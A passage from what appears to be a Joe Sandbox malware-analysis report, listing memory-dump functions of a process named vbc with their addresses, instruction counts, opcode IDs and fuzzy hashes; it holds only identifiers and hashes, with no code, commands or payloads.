                                                          • Source File: 00000005.00000002.578801743.000000000A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_a8f0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0306f3fd85b8856da0eecc4b146f29f00384f6d2ebf437871ef4f26fa3cfc559
                                                          • Instruction ID: 00525b4b6ec3b5b099e9f73163aa5824095e887f9c15efa1561aad98ff8a77bb
                                                          • Opcode Fuzzy Hash: 0306f3fd85b8856da0eecc4b146f29f00384f6d2ebf437871ef4f26fa3cfc559
                                                          • Instruction Fuzzy Hash: 0A411674B002148FCB54DF69D8889AEBBF6FF88715B11406AE906DB3A1DB31ED448B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0A8F30C8 Relevance: .1, Instructions: 116COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.578801743.000000000A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_a8f0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c47519334039d63de10bce632bb50b0970eca5a50f7df46a4e0d95363e79d4ac
                                                          • Instruction ID: 7e587831b6b12b0c894aefba45e871a3f241ff2e7a6fe15be118cb4c8da9d7bd
                                                          • Opcode Fuzzy Hash: c47519334039d63de10bce632bb50b0970eca5a50f7df46a4e0d95363e79d4ac
                                                          • Instruction Fuzzy Hash: E3412735B101148FCB54DFA9C8989AEBBF6FF88714B11406AE906DB3A1CB31ED44CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFDAA0 Relevance: .1, Instructions: 104COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7597ff34c4343681e348afc3c0bc56263590bf82b36dc0f9fb192f8dd224f3c6
                                                          • Instruction ID: 30b73a7cfe197fa5f53387ba4b22c606bc450d6f82223a2d6d3255d2b312c6be
                                                          • Opcode Fuzzy Hash: 7597ff34c4343681e348afc3c0bc56263590bf82b36dc0f9fb192f8dd224f3c6
                                                          • Instruction Fuzzy Hash: 54416234E10249DFCB14DFA4D8A8BAD7B71FF85310F1085A9E506AB3A4DF70A949CB80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF0DA8 Relevance: .1, Instructions: 100COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e74dd677dbff3ff4b64e20be90064ddbb444b7108d6c9eeecd0de167ea0a265c
                                                          • Instruction ID: b489a597541636b2a940591eb738e470614aa6e7f10b59772e483328c37a7bce
                                                          • Opcode Fuzzy Hash: e74dd677dbff3ff4b64e20be90064ddbb444b7108d6c9eeecd0de167ea0a265c
                                                          • Instruction Fuzzy Hash: DE31A030600701DFC710EB64E494A9EB3EBFFC0228B518E28D1564B6A4DF70BA4B8BD5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFF330 Relevance: .1, Instructions: 97COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d435692905e88951953dfba9c4127024b131bff581506a0139e66a24b07154f8
                                                          • Instruction ID: 35d785cb8a910bdbdb2133a47926926bfff9db3d33530fa654e810d3ceaa276c
                                                          • Opcode Fuzzy Hash: d435692905e88951953dfba9c4127024b131bff581506a0139e66a24b07154f8
                                                          • Instruction Fuzzy Hash: 4841D234E00209DFCB19DFA9C494AEDBBB6FF48314F2444A9E501A7360D731AD8ACB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF0DB8 Relevance: .1, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6506291d57475609457d214ec62ba7c1c620af1ef01aba2041cddac7afad5ed9
                                                          • Instruction ID: e1f6ad4d8af0821b7d78f1f8c19688784c6e569907f5f72b71af4003d2f28753
                                                          • Opcode Fuzzy Hash: 6506291d57475609457d214ec62ba7c1c620af1ef01aba2041cddac7afad5ed9
                                                          • Instruction Fuzzy Hash: 45319F30600701DFC710EB64E4949AEB3EBFFC0228B518E28D1564B6A4DF70BA4B9BD5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFABF8 Relevance: .1, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b7232a1338ec61b01fede05fffe99612e38ba0cbe1c8558d3f2ed7e04338f38a
                                                          • Instruction ID: 1433a041e6e5bbac7833e31688880ba27965caebd21e1fec9b16737d869958be
                                                          • Opcode Fuzzy Hash: b7232a1338ec61b01fede05fffe99612e38ba0cbe1c8558d3f2ed7e04338f38a
                                                          • Instruction Fuzzy Hash: 65318E76E0010D9FCB04DBE4D4546DEBBFAEF85308F118869D115AB290EF359E158B92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF2B30 Relevance: .1, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 628b386dce5cbc520254aa9f6eaab931b46b192d692921ff9ddeeb0ee29f492d
                                                          • Instruction ID: 5aba92ed923892f14e67c3ce65b4e8b14108db07e6e2219325fc429bf7ddff95
                                                          • Opcode Fuzzy Hash: 628b386dce5cbc520254aa9f6eaab931b46b192d692921ff9ddeeb0ee29f492d
                                                          • Instruction Fuzzy Hash: 7421F4357003109FCB289BB9D49992B7BFAEBC866131589BAF909C7341DE35CC06C760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF2310 Relevance: .1, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 35ad6c43d106651c5ff4d57f617ab970e358078cf19bc06e1caed27bc1fae7c6
                                                          • Instruction ID: 247f072817f752e1dcbfd4072808c3ec7e36cdf49fc2bf0b1c8a32dec9c582ee
                                                          • Opcode Fuzzy Hash: 35ad6c43d106651c5ff4d57f617ab970e358078cf19bc06e1caed27bc1fae7c6
                                                          • Instruction Fuzzy Hash: 893139346047408FC714DF24D598A6EBBF2FFC9321B158969E99B97791CB70E80ACB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFF305 Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a9dc148964b57d49dc0c62f3c13b80deb1ab4ad07eb5725e3fb43cc39ced0b5
                                                          • Instruction ID: 0d7a41c7854667bc35f526d89d1e5158caf4d6a8ceba4bf15c880f600ac5ffc0
                                                          • Opcode Fuzzy Hash: 3a9dc148964b57d49dc0c62f3c13b80deb1ab4ad07eb5725e3fb43cc39ced0b5
                                                          • Instruction Fuzzy Hash: 5A311930E10209DFCB19DF69D454AEDBBB2FF88310F2484A9E501AB261D771AD8ACF51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0A8F1430 Relevance: .1, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.578801743.000000000A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_a8f0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 12181eca2b2d72c0f8bd591434e593d23f6d1fe9329cc087af60ba2fba3c8313
                                                          • Instruction ID: a624489a86e156ec4c4a0a82f199c00ca2a1ab8e389362dd07ad3f023d66e2c1
                                                          • Opcode Fuzzy Hash: 12181eca2b2d72c0f8bd591434e593d23f6d1fe9329cc087af60ba2fba3c8313
                                                          • Instruction Fuzzy Hash: 7E21E73271460ACACB10AEB9D4440AAB7BABFE1251B158B3BDB56D7201FB31D544CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0A8F30AB Relevance: .1, Instructions: 84COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.578801743.000000000A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_a8f0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6abcd4e608d76ba738c1cbd43173a11eb3e41a3d1ae218d3a1c5a7db08573303
                                                          • Instruction ID: fb8817012573baa20a8ada92ebe1e0eb946ae9b5e3654a1e621ff1c6a25f6ca4
                                                          • Opcode Fuzzy Hash: 6abcd4e608d76ba738c1cbd43173a11eb3e41a3d1ae218d3a1c5a7db08573303
                                                          • Instruction Fuzzy Hash: C8312939B041058FCB44DF78D89996EBBB2FF89310B15806AE916DB3B1CB34AC45CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFF320 Relevance: .1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d95e5a70ce9f70a33787406c6dbdc3e14cbc6058a66e339c955464116c6d4e2a
                                                          • Instruction ID: 027bb3f1ca9adb289c835c911cc93d0da2c8ac4ecf703c3d88e6f050a755f940
                                                          • Opcode Fuzzy Hash: d95e5a70ce9f70a33787406c6dbdc3e14cbc6058a66e339c955464116c6d4e2a
                                                          • Instruction Fuzzy Hash: 7D310934E10209DFCB19DFA9C494AEDBBB2FF88314F2484A9E501A7261D7719D46CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFF46C Relevance: .1, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 50c0e2f42f6a4a4d660e41db425f11d9441b1cccf9113bb2530626d2fc261c94
                                                          • Instruction ID: 9384ed7041636cdddf2ae35b3756fcafa8b46c07589c3bafb5a8298fd960ed34
                                                          • Opcode Fuzzy Hash: 50c0e2f42f6a4a4d660e41db425f11d9441b1cccf9113bb2530626d2fc261c94
                                                          • Instruction Fuzzy Hash: 33314D32E0021ADFCF05DFA4E854AEEBBB5FF98310F14852AE515B3250DB309956CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0A8F4145 Relevance: .1, Instructions: 80COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.578801743.000000000A8F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8F0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_a8f0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1e367dd9df4d1665dcbd66556463ba75513895b16ceda2f720edc63a42c571b6
                                                          • Instruction ID: 664bfd5a0f918c20b50d2140b73cadc92277a899d7ecf59e2f50b46ae46a32e9
                                                          • Opcode Fuzzy Hash: 1e367dd9df4d1665dcbd66556463ba75513895b16ceda2f720edc63a42c571b6
                                                          • Instruction Fuzzy Hash: CB214DB5B041059FCB54ABB8D848DAAB7F2FF88704B158459E605EF362CB35EC058B54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055AD054 Relevance: .1, Instructions: 77COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.571346305.00000000055AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 055AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_55ad000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 68da4d5cd8224c75bc2b1a507a95d410c39639bf1ecb3f02065f08aabd96a2a1
                                                          • Instruction ID: 55791635a8b3ed917e2c7b12e4d3d4a5b3e9e36e05e89ebf45768868499fbfa8
                                                          • Opcode Fuzzy Hash: 68da4d5cd8224c75bc2b1a507a95d410c39639bf1ecb3f02065f08aabd96a2a1
                                                          • Instruction Fuzzy Hash: 2B210672504240DFCF15EF50D8C0F2ABBB6FB88314F248A69E9090B646C336E456CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF3810 Relevance: .1, Instructions: 76COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3ee78064b83193ec186bc8a283dfad898a5d41cc67372c8f95ee293d93a5bd37
                                                          • Instruction ID: f9a48ff13ebb023fe9325ee2210d12585a5f6143db4e57c2bd9a41cf39172a43
                                                          • Opcode Fuzzy Hash: 3ee78064b83193ec186bc8a283dfad898a5d41cc67372c8f95ee293d93a5bd37
                                                          • Instruction Fuzzy Hash: F921E2357003019BCB199F31C8A456A77E7FFC4221B1588ACE9468B391DF35EC86DB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055AD508 Relevance: .1, Instructions: 75COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.571346305.00000000055AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 055AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_55ad000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2c27f638c912bf6ac1da17305d6c37d259f5a735d898e03d8f73151517294be5
                                                          • Instruction ID: eb21face32dec5236d52d5243c04b923cb88b2e200b5fb8a64f47b21c569091c
                                                          • Opcode Fuzzy Hash: 2c27f638c912bf6ac1da17305d6c37d259f5a735d898e03d8f73151517294be5
                                                          • Instruction Fuzzy Hash: 2F2125B2504240DFDB05EF54D9C4F6ABBB6FB8C328F248969E8090B646C336D556CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055BD2F4 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.571394736.00000000055BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 055BD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_55bd000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec76d1bafa7a74efaccda11d44acd10e91cd27a3c60752a42b1592db0f26821e
                                                          • Instruction ID: 44ce5960bfb6723183ec076759786b1062e77233cc7bab980aef05d007a5a4f1
                                                          • Opcode Fuzzy Hash: ec76d1bafa7a74efaccda11d44acd10e91cd27a3c60752a42b1592db0f26821e
                                                          • Instruction Fuzzy Hash: CC21D7B5504244DFEB00DF54D4C8BAABBB6FB84324F24CA69D8494B246C3BAD446CAA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055BD4A4 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.571394736.00000000055BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 055BD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_55bd000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 63c2ce8ba53476981306c18905a714118d453a11079a2728b46f936f04950cb7
                                                          • Instruction ID: 4d7684291f8abb69fb077e9e85843f8c96397df1ab620c7bcefcbd9f8a38446a
                                                          • Opcode Fuzzy Hash: 63c2ce8ba53476981306c18905a714118d453a11079a2728b46f936f04950cb7
                                                          • Instruction Fuzzy Hash: A5213AB1504204DFEB00CF14D4C8F65BBB6FB84318F20C969D8490F281C3B6D946CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF90C0 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e097ae4550878bd9b6079f3edc2f2868d6583b4c23e51a9dcbbf10f917633384
                                                          • Instruction ID: 471935d4006c350f374613d8461ca237c03bd10b553924b8c689ccbc9889a1f7
                                                          • Opcode Fuzzy Hash: e097ae4550878bd9b6079f3edc2f2868d6583b4c23e51a9dcbbf10f917633384
                                                          • Instruction Fuzzy Hash: 4521A5347001069FDB24DAA9D4A4B6EF3EEEFC4264B04847AE909C7795EB70ED098791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF86A0 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 83dcfce6440ec4856b8a19fc5bfd78755fba61f4d55bd1dfce3682f789797aee
                                                          • Instruction ID: f977e3df2bb0cee44ed4e5c6ecd48db4f54e891d7f31b752045c0dcb8c4c62e2
                                                          • Opcode Fuzzy Hash: 83dcfce6440ec4856b8a19fc5bfd78755fba61f4d55bd1dfce3682f789797aee
                                                          • Instruction Fuzzy Hash: 4E11D635B002145FCF05EBA898556BE7BE6EFC9220F10847EE50ADB3A1DE349D059B92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF8810 Relevance: .1, Instructions: 64COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a2b982d75588a699e62e182d22c08c567ed9d01ca1f5c6e2702b51c8b21f1cbd
                                                          • Instruction ID: 0e81eb04dd1300d91f2a05d6f702b7a54cabef63c069a51706df6b7a7a6dce6b
                                                          • Opcode Fuzzy Hash: a2b982d75588a699e62e182d22c08c567ed9d01ca1f5c6e2702b51c8b21f1cbd
                                                          • Instruction Fuzzy Hash: 2D11E231B042809FC7219B78D02176A6BEA9BC5324B1588AAE449CF381EF30DC068781
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF86B0 Relevance: .1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cb9c08ecfae5099a6256c2bca0114dce94d892304156dc7290b1d55f05b8cce0
                                                          • Instruction ID: ec155a4bdfa2b60180423babc9c1323dcfe6879aaf7866e2b96fae23a849a7ca
                                                          • Opcode Fuzzy Hash: cb9c08ecfae5099a6256c2bca0114dce94d892304156dc7290b1d55f05b8cce0
                                                          • Instruction Fuzzy Hash: F711E335B002145BCF04EBA99854AAEBBEBEFC9220F508439F90ADB390DE309D055791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFD278 Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c7f42e0f77ac291d02dc947d157336f5aadb3b19b0c65cd5c1c8289ec6a3406e
                                                          • Instruction ID: 85f9543c65d3a590cb285379b4e2c3d17e8937ee4ed86a04d20f526a789af144
                                                          • Opcode Fuzzy Hash: c7f42e0f77ac291d02dc947d157336f5aadb3b19b0c65cd5c1c8289ec6a3406e
                                                          • Instruction Fuzzy Hash: D721B030A00A949FDF26ABA4D42C3AEBFB1FF82314F00455DE487922D0DB74559DCB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055AD04F Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.571346305.00000000055AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 055AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_55ad000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9797160fbef913990cb41bd393e9975328d22cd7c94b45d356f5b11d1ec81164
                                                          • Instruction ID: aaf80fcab95b2bd703c8d34778cdbfec6a44fb810a8c5a5ce7bfa8f8c30738b0
                                                          • Opcode Fuzzy Hash: 9797160fbef913990cb41bd393e9975328d22cd7c94b45d356f5b11d1ec81164
                                                          • Instruction Fuzzy Hash: D621AF76404280DFCF16DF10D9C4B5ABF72FB88314F2886A9DD490B656C33AD466CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BFD280 Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eb2b64a6146cd9baf9ef03395cc4ed508878255b9b18bea8a08c307409a5a62b
                                                          • Instruction ID: c5ff32da09198d1034e7dc6f39406b3361fe389b4b21cf17360389df7b577551
                                                          • Opcode Fuzzy Hash: eb2b64a6146cd9baf9ef03395cc4ed508878255b9b18bea8a08c307409a5a62b
                                                          • Instruction Fuzzy Hash: E5219D30A00A949FDF25ABA4D42C3AEBFB1FF82315F40445DE587922D0DBB4958DCB86
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055AD503 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.571346305.00000000055AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 055AD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_55ad000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 39903032e4c2c8bfd3c10ee34d43cc1c6e1ea91a30e6ecbff74bea9d2b62e736
                                                          • Instruction ID: 0b8aab7e3f0133951d602aef66c958a63eedf5e979a1466a978dad607a3b0df1
                                                          • Opcode Fuzzy Hash: 39903032e4c2c8bfd3c10ee34d43cc1c6e1ea91a30e6ecbff74bea9d2b62e736
                                                          • Instruction Fuzzy Hash: 7311D376504280DFCF11DF10D5C4B1ABF72FB88324F2486A9D8054B656C33AD45ACBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF0F10 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d48012f75b02c2c845c59927438a664153dc3530753197271f1b481819263b7f
                                                          • Instruction ID: 685bc4c998fdff7ec9f35738d772dfdc718351201eeca1a99e85e24161c1c367
                                                          • Opcode Fuzzy Hash: d48012f75b02c2c845c59927438a664153dc3530753197271f1b481819263b7f
                                                          • Instruction Fuzzy Hash: 4A1108313002018FC724EB59E4908AA77EEFFC42247504DA9E146CB661DB61B94B87D0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 09BF7450 Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.577230655.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_9bf0000_vbc.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6fe4adeaa4698f216ca63b9961a2fe66b9b449ed29b8fd4bf9224c543cbd2400
                                                          • Instruction ID: 983b2b5c0b5b104b5eba1b61305f540d3325617e26a73042414f3fa79705fb6b
                                                          • Opcode Fuzzy Hash: 6fe4adeaa4698f216ca63b9961a2fe66b9b449ed29b8fd4bf9224c543cbd2400
                                                          • Instruction Fuzzy Hash: D111BF71A00215DFCB10DF64D8949AEBBB6FF84320B048569ED4697390CB30AD16CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0A8F141D Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
